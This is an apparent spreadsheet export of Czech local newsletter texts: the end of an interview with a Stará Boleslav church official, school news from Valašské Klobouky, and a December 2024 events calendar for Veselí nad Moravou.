plánujete a co od něj očekáváte? Pro církev jde o zcela výjimečný rok, po 25 let slaví římskokatolická církev Svatý rok, od čehož všichni očekáváme mnohé, možná i proto, že bazilika Nanebevzetí Panny Marie ve Staré Boleslavi bude jednou z poutních bazilik. To by mohlo do centra české státnosti přivést více návštěvníků a poutníků a život v Boleslavi by mohl nabrat veselejší tempo. V roce 2023 přišlo do kostela svatého Václava téměř 21 000 návštěvníků, do baziliky Nanebevzetí Panny Marie zavítalo více než 80 000 turistů. V součtu činí návštěvnost obou kostelů 100 000 lidí, což považuji za velmi úspěšné číslo. Na rok 2025 plánujeme velkou investiční akci - rekonstrukci rezidence kapitulního děkanství ve svatováclavském areálu. Náklady na rekonstrukci činí 60 milionů Kč a jde o grant EU, kde jsme uspěli. Smlouva je podepsána, zhotovitel vysoutěžen, takže začít by se mělo v nejbližších dnech a hotovo by mělo být do konce roku 2026. V rámci tohoto projektu by měla proběhnout především repase kapitulní knihovny. Knihovna bude mít především badatelský charakter, protože se tam dají najít opravdu vzácné knihy a myslím, že by byla škoda, aby k nim historičtí badatelé neměli přístup. Další zrekonstruované prostory bychom chtěli využít pro muzeum staroboleslavských zajímavostí, protože boleslavská historie má co nabídnout, přestože byla několikrát téměř krutě drancována (husité, Švédové, nacisti, komunisti), ale vždy dokázala jaksi povstat z popela. O to bude historické ohlédnutí cennější. Občany zajímají i další záležitosti spojené s děním ve staroboleslavských kostelích. Jak to bude se zvonkohrou, na jejíž časté hraní si řada lidí stěžuje? A jak to bude se staroboleslavským infocentrem? Zvony prostě do kostelů patří, i když jich řada zmizela především za světových válek dvacátého století. Na věži baziliky svatého Václava jsou tři zvony z doby středověku a mají obrovskou historickou hodnotu. Slyšet je můžete především během svatováclavské pouti. Jejich zvuk je opravdu jedinečný a možná ho reprodukovaně budeme moci slyšet častěji. U mariánské baziliky jsme se pokusili o obnovení zvonkohry a zprovoznění stávajících zvonů. Na věži baziliky jsou čtyři historické zvony. Stála za tím paní Eva Špinarová, paní Irena Černá a paní doktorka Zdena Tichá. Jejich aktivita přinesla do sbírky nevídaných 280 000 Kč, za což jsme všem dárcům velice vděčni. Kapitula se pokouší zvonkohru obnovit, což celkem zatím nějak funguje. Hrají se dvě melodie písní Tisíckrát pozdravujeme Tebe a Svatý Václave . Původně měla zvonkohra hrát každou hodinu, ale na přání obyvatel jsme se domluvili s městem, že se bude hrát pouze v 9.00, ve 12.00, v 18.00 a zvony budou zvonit před každou bohoslužbou. Myslím, že jde o rozumný kompromis. Infocentrum bude nadále fungovat v obvyklém modu, o jeho rušení v žádném případě neuvažujeme. Po změně na radnici se stal opět aktuálním projekt Orlovny. Jak to vypadá a platí smlouva mezi městem a kapitulou? Projekt tvz. Orlovny je v neměnném stavu. Smlouva s městem není naplňována. Kapitula však tento projekt nezavrhla a ráda by na něj nějakým způsobem navázala. Na tahu je však město, od kterého bychom požadovali kompletní stavební dokumentaci včetně stavebního povolení. Potom bychom mohli záměr posoudit a nějakým způsobem v něm pokračovat a posunout ho dále. O tom, zdali budeme pokračovat ve spolupráci s městem či budeme objekt rekonstruovat nějak jinak, teprve uvidíme. Rozhodnou i další jednání s městem včetně možností finančního krytí celé investice. Zájem tedy máme, ale další krok musí nyní udělat město. Za dveřmi je advent. Co pro věřící, a nejen pro ně, toto období znamená a na co se mohou lidé těšit? Je to období rozjímání, tiché radosti a těšení se na Vánoce i na zimní slunovrat. Advent představuje i naději, protože ta je v dnešní rozpolcené době více než důležitá. Pro věřící i občany připravujeme tradiční akce, kterými jsou především betlém v životní velikosti a jedinečná výstava betlémů v boleslavské bráně. Doporučuji návštěvu především místním školám a školkám. Vedle toho samozřejmě připravujeme půlnoční a novoroční mši. Tu by měl celebrovat emeritní pražský arcibiskup Dominik kardinál Duka. Věříme, že se podaří zrealizovat i novoroční koncert Jaroslava Svěceného . Jak vypadá Váš Štědrý den a vlastně i celé Vánoce? Jaké tradice ctíte? Můj Štědrý den je pracovní a tak tomu je již mnoho let. V podstatě celý den jsem v kostele a připravuji štědrovečerní mše, jedna je v 16.00, druhá o půlnoci. Takže je to honička, a když na chvíli přijdu domů v době, kdy si většina lidí užívá kapra a vánočních dárků, snažím se ve svém věku trochu odpočívat. Samozřejmě si něco tradičního dopřeji především díky svým přátelům, kteří mě bohatě zásobují, a tímto jim velice děkuji. Co byste občanům popřál pod stromeček a do roku 2025? Jak jsem se již zmínil, aby Vánoce byly svátky radosti, a především naděje, že se snad dočkáme příznivějších časů a ve společnosti zavládne větší vzájemné porozumění. Foto: Alois Vašků Autor: Za rozhovor děkuje Petr Čeněk Autor person Petr Čeněk</t>
  </si>
  <si>
    <t>20241201_375_3473472679_d8b37de46067a30eea13.html</t>
  </si>
  <si>
    <t>d8b37de46067a30eea13</t>
  </si>
  <si>
    <t>ZPRÁVY ZE ŠKOL</t>
  </si>
  <si>
    <t>ZPRÁVY ZE ŠKOL DÝŇOBRANÍ Pod názvem „Dýňobraní“ se konala na naší školní zahradě podzimně laděná rodinná akce. Téma dýní, dýniček, tykví a tykviček provázelo děti z naší mateřské školy předposlední říjnový týden. Děti měly možnost zhlédnout různé druhy dýní, porovnat rozdíly mezi nimi, skládat podle velikostí i prozkoumat jejich povrch i dužinu. Nechybělo ani tradiční dlabání dýně a další aktivity týkající se této královské zeleniny. Díky počasí, které nám celý týden přálo, jsme toto téma završili akcí pro celou rodinu. Na zahradě školky jsme pro děti připravili dobrodružnou dýňovou stezku tykvičky Janičky a dýně Olívie. Celý týden společně s rodiči plnily úkoly týkající se právě dýní a tykviček. Čekalo na ně malování na obličej, hledání stínů tykviček nebo například dýňový slalom či šipkový labyrint, případně krmení hladové dýně Olivie. Závěr týdne pak patřil tolik očekávané dýňové slavnosti. Děti nosily svá strašidýlka a výtvory z dýní, které následně rozsvítily naši školní zahradu. A věřte nebo ne, byl to opravdu kouzelný pohled. Některé dýně se na nás usmívaly, některé hrozivě mračily, některé dokonce zlověstně blikaly, ale ze všech sálala radost. A ještě krásnější bylo pozorovat děti, které se přišly podívat, jak právě to jejich strašidýlko krásně svítí. No, ne nadarmo se říká: dýně je královna podzimu. Bc. Eva Bartová NA SVATÉHO MARTINA BÝVÁ BÍLÁ PEŘINA Svatý Martin, který podle pranostiky přijíždí na bílém koni, je svátek, který připadá na 11. listopadu a symbolizuje blížící se zimu. Pro mnohé je příležitostí k ochutnání prvního vína z letošní sklizně i některých svatomartinských dobrot, zato pro nás to je čas na realizaci již tradičního svatomartinského setkání u nás ve školce. Hlavní myšlenkou celé akce je uvědomit si krásu lidových tradic a jejich jedinečnost a snažit se objevit moudrost, která je v nich ukryta. Akce začala před mateřskou školou v 15 hodin; zanedlouho byla zahrada plná malých i velkých nedočkavých návštěvníků, kteří obdrželi od sněhových vloček kouzelné svatomartinské podkovičky, které jim zaručovaly kouzelnou moc a sílu při zdolávání úkolů. Čekaly na ně například krmení hladových hus, tajemné Martinovy sklenice, vločkování na světelných tabulích, výroba sněžné čelenky nebo překážková svatomartinská dráha. A nemalým přínosem k dobré akci byla i možnost jízdy na koníkovi, kterou nám zprostředkoval pan Fiala, majitel potravin ve Valašských Kloboukách , kterému mnohokrát děkujeme. V zápalu plnění úkolů čas rychle utíkal, a než se na obloze objevila první hvězdička, odtajnily děti společně se sněhovými vločkami tajenku, která zaručila příjezd tolik očekávaného svatého Martina na bílém koni. Navzdory chladnému počasí bylo pro nás nejkrásnější odměnou vyprovázení svatého Martina . Rozzářili jsme společně nejen lampionky, ale i všechna užaslá dětská očka. Vždyť rozdávat úsměv, dobrou náladu a přátelství, to nic nestojí – a to „málo“ může dát každý z nás. Bc. Eva Bartová DEN OTEVŘENÝCH DVEŘÍ 14. listopadu 2024 jsme – tak jako každý rok – otevřeli školu všem návštěvníkům. Především blízké těch nejmenších přitáhly ukázkové hodiny ve třídách i odborných pracovnách. Rodiče mohli vidět, jakým způsobem a co ve škole učíme, a především co všechno už jejich děti umějí. Podrobnější informace o výsledcích vzdělávání svých dětí pak rodiče získali odpoledne na schůzkách rodičů s jednotlivými učiteli. Na chodbách a dalších společných prostorách školy byly pro návštěvníky připraveny doprovodné akce. V jídelně si naše Zdravá školní kuchyně připravila ochutnávky svých výrobků, návštěvníci školy mohli zkusit netradiční a zajímavé pokrmy. Hned u vstupu do školy mohli rodiče i další návštěvníci podpořit charitativní bazárek výrobků našich žáků. Kousek dál v přízemí nabízela Podzimní čajovna kromě čaje také doma vyrobené pečivo a zákusky. Hned vedle čajovny předváděla paní Amelie Janíková aktivity a pokusy ze svého Zápisníku, souboru žákovských badatelských aktivit, a společně s paní Martinou Poláchovou představily činnost vzdělávacího centra Veronica Hostětín. O patro výš si žáci 7. B připravili fairtradovou kavárnu. Výtěžek z prodeje charitativního bazárku, Podzimní čajovny a fairtradové kavárny poputuje do Základní školy Česká Ves , která byla zničena nedávnými povodněmi; celkem všichni návštěvníci přispěli více než 50.000 Kč. Všem dárcům, kteří přispěli, moc děkujeme za podporu dobré věci. Mgr. Karel Ptáček DĚTI PROTI NÁSILÍ Některé děti stále vyrůstají v prostředí, ve kterém nejsou úplně bezpečné a šťastné. Stávají se oběťmi fyzického, psychického nebo dokonce sexuálního násilí. Ty jsou často pro společnost neviditelné a ticho je před násilím neochrání. V České republice je zasaženo násilím v rodině neuvěřitelných 14 % dětí; každé sedmé dítě se tedy potkalo s nějakých druhem útoků. Každý může mít ve svém okolí děti nebo celé rodiny, které se s takovou situací potýkají. S násilím se můžeme vypořádat pouze tak, že ho nebudeme bagatelizovat, ignorovat, považovat za něco, co se nás netýká. Ani naše škola před násilím na dětech nezavírá oči. V rámci Týdne za dětství bez násilí se již podruhé naše škola zapojila do akce Bubnovačka, která upozorňuje na důležitost ochrany dětí před násilím v rodině. Účastí v Bubnovačce jsme dali jasně najevo, že násilí do výchovy a do života dětí nepatří. Mgr. Karel Ptáček a Mgr. Jiří Dohnal FAIRTRADOVÁ KONFERENCE 4. listopadu se žačky 9. C vypravily za doprovodu paní učitelky Šebákové a paní Evy Fialové jako zástupkyně za Zdravé město Valašské Klobouky na fairtradovou konferenci v Muzeu literatury v Praze . Na konferenci zazněly zajímavé informace o založení a historii Fairtrade a potěšila nás také prohlídka samotného muzea. Měli bychom si uvědomit, že za každým čtverečkem čokolády, šálkem kávy nebo banánem stojí lidé, kteří dennodenně těžce pracují na plantážích. „Konference byla celkově skvělá, ať už to byla zajímavá témata, dobré jídlo nebo prostor na otázky, který jsme také využily,“ poznamenala žákyně 9. C. Děkujeme za podporu Zdravému městu Valašské Klobouky, které uhradilo našim žákyním náklady na dopravu. RNDr. Michaela Šebáková ÚSPĚCHY V SOUTĚŽÍCH Atletické družstvo Dominik Míča, Radek Novotný, Pavel Bartoš, Zuzana Janovská, Natálie Poliaková, Magdaléna Slováková a Lýdie Rumanová vybojovalo na osmiboji Memoriálu Karla Vystrčila ve Slavičíně krásné 2. místo. V rámci „Valašské sportovní ligy“, sportovního seriálu, do kterého je zapojeno osm škol, jsme díky vítězství v malé kopané, druhému místu v závodech v přespolním běhu a šestému místu ve vybíjené na průběžném prvním místě celkového hodnocení. V soutěži Logická olympiáda, kterou pořádá Mensa Česko, byli vyhlášeni jako nejlepší řešitelé Ondřej Čureček (5. B), Jakub Měšťánek (5. C), Nela Zelinková (5. B), Zita Čočková (7. B), Barbora Cahlová (9. B) a Tereza Fojtíková (9. A). V celostátní soutěži Přírodovědný klokan 2024 nasbírali nejvíce bodů Adam Masař (9. B), Jaroslav Turek (8. B), Jakub Kostka (9. C), Alexandr Mužikovský (8. A) a Vojtěch Struška (9. C). Děkujeme všem soutěžícím za úspěšnou reprezentaci naší školy. Mgr. Karel Ptáček GYMNÁZIUM SLAVILO 75 LET Letošní podzim byl na našem gymnáziu obdobím plným pestrých událostí, které odrážely jak dlouholetou tradici školy, tak kreativitu a aktivní zapojení studentů i pedagogů. Gymnázium Valašské Klobouky si v polovině října připomnělo 75 let od svého vzniku slavnostními akcemi, které spojily současné i bývalé studenty, pedagogy, významné hosty a přátele školy. Oslavy začaly vernisáží studentských prací „Plenér 2024“ v Galerii G. Páteční slavnostní program zpestřil Evropský den jazyků s jazykovými aktivitami a ochutnávkami typických jídel. Vrcholem oslav byla slavnostní akce v budově gymnázia, kde ředitel Jaroslav Šůstek ve svém projevu poděkoval bývalému vedení v čele s Evou Cepkovou za její přínos pro školu. Hejtman Radim Holiš a starosta Josef Bělaška zdůraznili význam gymnázia pro region. Program doplnily vystoupení školního sboru, moderovaný program a prohlídka výstavy studentských děl. Slavnostní den zakončil společenský raut, kde mohli hosté zavzpomínat a sdílet vzpomínky na léta strávená na škole, která má v našem regionu dlouhou tradici. Tradiční a oblíbená olympiáda v netradičních sportech se uskutečnila již 17. října. Žáci se utkali ve sportovních disciplínách, jakými jsou přetahování lanem či opičí dráha, ale také ve vědomostních a logických úlohách, jakými byly vázání uzlů či skládání origami. Na soutěži Re-Power Your Future, kde se studenti z celého kraje utkali v dovednostech finanční gramotnosti a podnikavosti, naši školu reprezentoval Vít Studeník (3. B). Vítkův tým získal druhé místo za svůj inovativní podnikatelský plán, čímž nejen přispěl k úspěchům školy, ale také si odnesl cenné zkušenosti do budoucna. 22. říjen byl pro studenty 4. ročníku příležitostí nahlédnout do temného období českých dějin, a to prostřednictvím přednášky Lubomíra Vejražky z Ústavu pro studium totalitních režimů. Tématem byly věznice a pracovní lágry 50. a 60. let, kam byli neprávem posíláni čeští občané kvůli vykonstruovaným politickým obviněním. Studenti 3. ročníku navštívili 24. října společnost Eurocorp Trade, s. r. o., se sídlem ve Valašských Kloboukách . Během prohlídky se seznámili s fungováním obchodní firmy a vyzkoušeli si různé úkoly spojené s prací v tomto odvětví. Koncem října se uskutečnil tradiční podzimní koncert, který je vždy vítaným kulturním zpestřením. Účinkující studenti předvedli své hudební umění, ať už sólově nebo ve skupinách. Publikum si užilo vystoupení cimbálové muziky i různých sólových nástrojů. Zvláštním hostem večera byl absolvent gymnázia Pavel Macháč ml., který se po boku studentů blýskl virtuózní hrou na saxofon. Součástí dne estetické výchovy byla i návštěva kina Svět, kde studenti prvních a druhých ročníků zhlédli film „Identita – příběh českého grafického designu“. Dokumentární film je provedl historií české vizuální kultury, jejíž součástí jsou takové osobnosti jako Alfons Mucha či Tomáš Baťa . Studenti prvních ročníků se v rámci výuky angličtiny zapojili vyřezáváním dýní do oslav Halloweenu. Jejich originální výtvory ozdobily schodiště školy. Ve dnech 8. a 9. listopadu proběhl na našem gymnáziu tradiční den otevřených dveří, který přilákal mnoho zájemců o studium. Budoucí studenti měli možnost prohlédnout si prostory školy a na vlastní oči vidět, jak probíhá výuka i školní život. Role průvodců se ujali současní studenti gymnázia, kteří návštěvníky provázeli po třídách, laboratořích i sportovních prostorách. Děkujeme všem, kteří nás přišli navštívit, a těšíme se na nové uchazeče o studium na naší škole. 11. listopadu se naši studenti zúčastnili mezinárodního florbalového turnaje středních škol ve Slavičíně . Díky skvělé týmové spolupráci a bojovnému výkonu se jim podařilo obsadit krásné 3. místo. 12. listopadu se studenti našeho gymnázia zúčastnili poutavé přednášky o životě Nicholase Wintona , který během 2. světové války zachránil 669 československých židovských dětí. Z příběhu Nicholase Wintona si studenti odnesli cenné poselství o tom, jak důležitá je odvaha a lidskost v těžkých časech. 14. listopadu se studenti třetího ročníku zúčastnili ve Zlíně Festivalu svobody, a to pořadu Listopad ’89. Hlavními hosty byli Jiří Dienstbier a Milan Uhde , kteří diskutovali o významu událostí roku 1989, mluvili o svých osobních zkušenostech a hodnotách svobody a demokracie. Naši studenti Emma Burešová, Lucie Manová a Jakub Vaculín nás reprezentovali ve znalostech evropské historie v letech 1975–2000. Po úspěšném zvládnutí krajského kola postoupili do mezinárodního kola dějepisné soutěže v Chebu . Mgr. Jaroslava Machalová PROJEKTOVÁ VÝUKA MIMO ŠKOLU Projektová výuka – v rámci projektu „Pro inovativní výuku“ – proběhla ve středu 23. října ve firmě KDL Transport a zúčastnili se jí žáci 3. ročníku oboru Mechanik opravář motorových vozidel. Žáci měli možnost se podrobně seznámit s profesí profesionálního řidiče v mezinárodní automobilní dopravě. Vyzkoušeli si přípravu vozidla před cestou, úkony základní údržby a kontroly povinné výbavy. Zajímavá byla pro ně praktická část, a to spojení tahače s návěsem. Na závěr nechyběly ani kondiční jízdy s vozidlem. Ing. Kamil Ptáček EXKURZE: PRAHA! Jak už je zvykem, na začátku školního roku jezdí žáci posledních ročníků do Prahy . Letos se tam vypravil druhý ročník oboru Podnikání a třetí ročník oborů Automechanik a Zedník. Prošli jsme Prahu křížem krážem, navštívili mnoho pamětihodností historických i moderních, dali si něco dobrého k jídlu i k pití a podívali se na Prahu z výšky. Co žáky nejvíce zaujalo? Určitě to byly vojenské muzeum na Žižkově , Království železnic, Národní muzeum , trezor v České národní bance , střídání stráže před branami Pražského hradu, procházka Jelením příkopem, mechanická socha Franze Kafky , orloj na Staroměstském náměstí , running sushi a pohled z žižkovské věže. Bylo toho opravdu hodně a všichni si výlet do Prahy užili. Ing. Jaroslava Pospíšilová a Mgr. Pavla Mládková, Ph.D. HUSÍ HODY 8. listopadu se uskutečnila v Domě na rohu ve Valašských Kloboukách akce Husí hody, kterou organizovala naše škola. Již ve čtvrtek se začalo s přípravami. Žáci 1. ročníku oboru Kuchař-číšník vařili zelí, čistili a předpékali husy, chystali knedlíky a pekli z lineckého těsta husičky. V pátek již probíhaly od dopoledne až do večera Husí hody. Návštěvníkům jsme podávali pečené husí stehno, červené zelí, karlovarský a bramborový knedlík, dezertem byly linecké husičky s marmeládou. Podávala se také svatomartinská vína a další pochoutky. O obsluhu hostů se postarali žáci 2. ročníku Marie Cucová a Radek Forman , z nástavbového studia pak Sabina Formanová. Ve večerních hodinách hrála k poslechu a tanci hudba Filtr Band, které děkujeme za skvělou muziku a příjemnou atmosféru. Velké díky patří také všem žákům a organizátorům, kteří nebyli vidět. Všichni tak přispěli k pěkné prezentaci naší školy. Věříme, že se budeme při takových akcích s našimi hosty setkávat i nadále. Bc. Blanka Ovesná a Ing. Zuzana Valčíková FOTBALOVÉ ODPOLEDNE V NOVÝCH DRESECH V polovině listopadu jsme měli v dětském domově ve Smolině vzácnou návštěvu – trenéry a hráče z fotbalového klubu FC Brumov. Naše děti se každoročně účastní fotbalových turnajů mezi dětskými domovy, na konci dubna probíhá v našem areálu tzv. čarodějnický fotbal, některé děti se fotbalu věnují i ve volném čase a reprezentují okolní kluby. Fotbal nás tady ve Smolině všechny baví. Společnost Secapro nám darovala krásné nové dresy, za které děkujeme a kterých si moc vážíme. Právě z tohoto důvodu jsme chtěli nové dresy pořádně „pokřtít“. Dne 15. listopadu si na nás udělali čas trenéři z fotbalového klub FC Brumov a absolvovali s našimi dětmi na hřišti dětského domova tréninkovou jednotku, při níž se všichni pořádně rozcvičili. Do tréninku se zapojili také hráči z brumovského A-týmu, kteří se této akce účastnili a zahráli si s dětmi i závěrečný zápas mezi dvěma týmy. Hráči pak museli odjet na trénink svého klubu, trenéři však ještě přijali pozvání do naší jídelny, kde bylo připravené občerstvení a přípitek na naše nové dresy. Dostali jsme od klubu i kopačky pro naše malé fotbalisty, trenéři nám přivezli i dres, plakát, kartičky a pozornosti od klubu FC Baník Ostrava . Moc děkujeme trenérům i hráčům za jejich čas, který nám věnovali. Těšíme se na příští setkání. Sportu zdar a fotbalu zvlášť! Bc. Jana Trochtová, vychovatelka DD ve Smolině</t>
  </si>
  <si>
    <t>20241201_376_3473464393_5cb27556ba37571064c0.html</t>
  </si>
  <si>
    <t>5cb27556ba37571064c0</t>
  </si>
  <si>
    <t>POZVÁNKY</t>
  </si>
  <si>
    <t>POZVÁNKY SOBOTA 30. LISTOPAD 15:00 VERNISÁŽ VÝSTAVY CESTOU BETLÉMSKÉ KOMETY Městská galerie na Panském dvoře Srdečně vás zveme na výstavu Cestou betlémské komety, která se nachází v Městské galerii na Panském dvoře. Těšit se můžeme na tradiční adventní výstavu betlémů a mapování času od adventu do Tří králů. Výstava bude k vidění do 12. ledna 2025. Otevírací doba galerie: út, čt, so, ne 13:00– 17:00. Jindy pouze po individuální domluvě – tel.: +420 518 321 881, e-mail: info@tic-veseli.cz. NEDĚLE 1. PROSINEC 15.00 ADVENTNÍ KONCERT: NA KŘÍDLECH ANDĚLŮ Kostel svatých Andělů strážných Vystoupí tito účinkující: sólová zpěvačka Alžběta Symerská, klavíristka Barbora Pančíková, varhaník Jiří Kovář a komorní soubor ESO trio. Zaznějí skladby od významných českých i zahraničních hudebních skladatelů. Výtěžek z dobrovolného vstupného bude určen na podporu sociálních projektů Charity Veselí nad Moravou . NEDĚLE 1. / 8. / 15. PROSINEC 17:00 NEDĚLNÍ PROMÍTÁNÍ U ČAJE A SVAŘÁKU Náměstí Míru Zveme vás na nedělní promítání na náměstí Míru . Těšit se můžete na pohádky a filmy, které potěší celou rodinu. Čekají nás S čerty nejsou žerty (1. 12.), Pelíšky (8. 12.) a Anděl Páně 2 (15. 12.). Přijďte si užít adventní atmosféru! ČTVRTEK 5. PROSINEC 10:00 S NEJMENŠÍMI ZA POHÁDKOU Dětské oddělení městské knihovny Program pro rodiny s dětmi do 3 let (z cyklu BOOKSTART). Pohádku zahraje Lenka Tillichová . Malí návštěvníci se poté mohou zapojit do připravených aktivit. PÁTEK 6. PROSINEC 19:00 KONCERT: VÍNEK STONULÝ Koncertní sál ZUŠ Základní umělecká škola Veselí nad Moravou vás srdečně zve na koncert Vínek stonulý. Můžete se těšit na písně a skladby Leoše Janáčka v podání Brněnského rozhlasového orchestru lidových nástrojů (BROLN) a mužského vokálního kvarteta Q VOX. Vstupné dobrovolné. 20:00 VINYLA: SEVERNÍ NÁSTUPIŠTĚ A ČLOVĚK KRVE Kafé v kině Dvě perly české folkové scény se setkají na jednom pódiu. Nástupiště vás pozve na společný vandr, kde se můžete přidat do sboru a zažít jedinečnou atmosféru jejich koncertů. Člověk krve vás zase zavede do magické krajiny Stříbroskalicka svými poetickými texty a originálním zvukem. Vstupenky jsou k dostání v předprodeji na GoOut. 20:00 TANČÍRNA Panský dvůr Srdečně vás zveme na večer plný hudby, tance a dobré nálady! Tančírna se uskuteční 6. prosince od 20:00 ve víceúčelovém sále na Panském dvoře. Přijďte si užít uvolněnou atmosféru tančírny, kde bude parket patřit všem – ať už jste začátečníci, pokročilí, nebo nadšení milovníci pohybu z jiných měst či tanečních kurzů. Během večera se budou střídat latinskoamerické a standardní rytmy, takže si každý najde to své. Tancujte podle vlastní chuti, bez stresu a s radostí z pohybu. SOBOTA 7. PROSINEC 15:00 ADVENT V CENTRU MĚSTA S MIKULÁŠSKOU NADÍLKOU Náměstí Míru Přijďte si užít předvánoční atmosféru plnou vůní svařeného vína a vánočního cukroví. Na programu budou vystoupení uměleckých souborů, jako je dramatický kroužek DDM pod vedením Zacharije Mazničenka, pěvecké sbory, vystoupení ZUŠ či krasobruslařů. Nebude chybět ani Mikuláš s čertem, kteří si připravili pro děti sladkou odměnu a pekelnou váhu hříchů. Večer završí vystoupení horňáckého mužského sboru z Lipova a saxofonového tria Marka Kotači. NEDĚLE 8. PROSINEC 14:00 VÁNOČNÍ HELIGONKY Kulturní dům Vánoční setkání heligonkářů a harmonikářů. Vstupné 150 Kč. Bližší info a přihlášky účinkujících na tel. č. 604 886 957. ČTVRTEK 12. PROSINEC 17:30 VÁNOČNÍ VYSTOUPENÍ ZUŠ Kimo Morava Základní umělecká škola Veselí nad Moravou vás srdečně zve na tradiční Vánoční vystoupení ZUŠ. V programu se vám představí žáci všech oborů. Vstupné dobrovolné. 16:00 VÁNOČNÍ DÍLNA Zarazické centrum Centrum pro rodinu zve na Vánoční dílnu v klubovně Centra pro rodinu v Zarazicích . Budeme vyrábět půvabné andělíčky a stromečky technikou macramé. S sebou ostré nůžky, hustý hřeben a peníze na materiál. Děti vstup zdarma. SOBOTA 14. PROSINEC 15:00 ADVENT V CENTRU MĚSTA Náměstí Míru Srdečně vás zveme na tradiční advent v centru města s bohatým kulturním programem: Od vánočních melodií v podání Vojenské hudby Olomouc přes vystoupení našich nejmenších z mateřské školy až po exhibiční vystoupení krasobruslařů z KRASO Břeclav. Večer pak roztančí náměstí Míru místní kapela FREETOM music band. Těšíme se na vás. 16:00 ZARAZICKÉ ČERTOVINY Zarazické centrum Srdečně vás zveme na Zarazické čertoviny, které se uskuteční 14. prosince od 16 hodin v Zarazickém centru. Přijedou k nám čerti z Tasova s Mikulášem a anděly. Odvážlivci si mohou vyzkoušet pekelnou váhu. Program pro nejmenší: malování na obličej, tvořivé dílničky, čertovská dráha, pošta pro Ježíška. Chybět nebude ani pekelné občerstvení. 19:00 KONCERT KOUZLO VÁNOC – GRANDE MORAVIA Kino Morava Zveme vás na večer plný vánoční hudby. Přijďte si užít jedinečnou atmosféru vánočních svátků a nechte se unést krásnými melodiemi. Kromě orchestru se můžete těšit na vystoupení talentovaného dívčího tria Tři barvy. NEDĚLE 15. PROSINEC PASTÝŘSKÁ NEDĚLE Dům přírody Bílých Karpat Přijďte si vysoutěžit slevu na vstupném, připraveny budou dílničky a tematické aktivity. 15:00 DIVADELNÍ PŘEDSTAVENÍ ŽABÁCI (SNY STARÉHO DĚDKA) Kulturní dům Zveme vás na loutkové představení Žabáci (Sny starého dědka), které se uskuteční 15. prosince od 15:00 hodin v kulturním domě. Ponořte se do světa fantazie a magie, kde ožívají dřevěné bytosti vytvořené zručnýma rukama řezbáře. Příběh dvou slavných žabích kamarádů a jejich dobrodružství vás zavede do tajemné zahrady plné překvapení. Vstupenky si můžete zakoupit na webu www. kultura-veseli.cz nebo v Turistickém centru Veselska na Panském dvoře. 18:00 KONCERT: JOE GEORGE Kafé v kině Přijďte si užít nezapomenutelný večer s Joe Georgem ! Tento talentovaný písničkář a skladatel filmové hudby vás okouzlí svou hudbou, která spojuje tradici a modernu. Vstupenky koupíte online na www.kultura-veseli.cz nebo v Turistickém centru Veselska na Panském dvoře. PONDĚLÍ 16. PROSINEC 18:00 KŘEST KNIHY „HUDEBNÍ DĚJINY VESELÍ“ Základní umělecká škola Veselí nad Moravou Srdečně vás zveme na křest knihy „Hudební dějiny Veselí“ od autora Jiljího Minaříka. Přijďte se s námi ponořit do bohaté hudební historie našeho města. SOBOTA 21. PROSINEC 15:00 Advent v centru města Náměstí Míru Srdečně vás zveme na tradiční advent v centru města, přijďte si užít předvánoční odpoledne plné hudby! Čeká vás bohatý program s vystoupením folklorního souboru Štěpnička, žáků základní umělecké školy a mladých hudebních talentů. Nebude chybět ani předvánoční trh a skvělá atmosféra. Přijďte s celou rodinou a užijte si s námi předvánoční čas! 18:00 ADVENTNÍ KONCERT: PROROKOVALI PROROCI Kostel svatých Andělů strážných Nechte se unést krásou tradičních i netradičních úprav adventních písní a moravských koled, z nichž mnohé pocházejí z pera skladatele Filipa Gajdy. Vstupenky si můžete zakoupit na webu www. kultura-veseli.cz nebo v Turistickém centru Veselska na Panském dvoře. PONDĚLÍ 23. PROSINEC 16:30 BETLÉMSKÉ SVĚTLO Skautská klubovna (začátek) V 17:00 vyjde od skautské klubovny v Hájku průvod s Betlémským světlem. Projdeme ulicemi Za Hájkem, Jezerní, Moravní a U Stavu na Bartolomějské náměstí. Zde bude možnost zažehnout si vlastní svíčku až do 18:30. Další příležitost k zapálení Betlémského světla bude 24. 12. v kostele svatých Andělů strážných. 17:30 HUDBA NA ROHU Roh ulic A. Jiráska a Štefánikovy Máte rádi melodie z legendárních vánočních filmů, jako je Sám doma, Vánoční prázdniny či Láska nebeská? Tak neváhejte a těsně před Štědrým dnem přijďte na roh ulic A. Jiráska a Štefánikovy. Letos už po šesté uslyšíte známé a oblíbené vánoční songy v podání zpěváka a kytaristy Toma Mikulce. Občerstvení pro zahřátí zajištěno. V případě nepříznivého počasí se akce nekoná. ČTVRTEK 26. PROSINEC 17:00 ŠTĚPÁNSKÉ KOLEDOVÁNÍ S CIMBÁLOVOU MUZIKOU BOZATÍN Kulturní dům Přijďte si užít kouzelnou atmosféru Štědrého dne a nechte se unést krásnými koledami v podání horňácké cimbálové muziky Bozatín. Tato talentovaná skupina muzikantů vám zaručeně vytvoří nezapomenutelný zážitek. Vstupné 100 Kč. SOBOTA 28. PROSINEC 18:00 VOJENSKÝ UMĚLECKÝ SOUBOR ONDRÁŠ – KONCERT CESTA SVĚTLA Kostel svatých Andělů strážných Cesta světla je hudební cyklus, který vypráví příběh narození Ježíše Krista a současně nahlíží do atmosféry lidových Vánoc. Hudebně vychází především z dobře známých českých a moravských koled, které však zaznějí v nevšedních orchestrálních a vokálních aranžmá. Posluchače čeká barvitá cesta ke Kristovu narození, stejně jako k lidskému pochopení této zázračné události. Vstupenky v prodeji na webu www.kultura-veseli. cz nebo v Turistickém centru Veselska na Panském dvoře. PONDĚLÍ 30. PROSINEC 17:00 ZARAZICKÉ KOLEDOVÁNÍ U kapličky ( Zarazice ) Program plný radosti a vánoční atmosféry. Těšit se můžete na nezapomenutelnou atmosféru, která propojí hudbu, zpěv a tradice. Přijďte s námi oslavit konec roku v kruhu přátel a rodiny. V pestrém programu se představí děti z MŠ Zarazice, DFS Štěpnička, Veselský mužský sbor a Mužský sbor Spinek, Znorovské klekánice, Vnorovské žestě, dramatický kroužek DDM. Těší se na vás Spolek pro kulturu a rozvoj Zarazic . 18:00 ROZLOUČENÍ S LOŇSKÝM RO(C)KEM Náměstí 24. dubna (park) Zveme všechny příznivce Toma Mikulce a kapely FreeTom music band na improvizované hudební setkání za doprovodu dobrého jídla a pití. Přijďte se společně s námi vesele rozloučit se starým rokem a připravit se na Silvestra a příchod nového roku! V případě nepříznivého počasí se akce nekoná. PÁTEK 3. LEDEN 19:00 NOČNÍ TŘÍKRÁLOVÉ KOLEČKO Skautská klubovna (začátek) Noční tříkrálové kolečko, dvanáctikilometrové putování noční krajinou Veselska 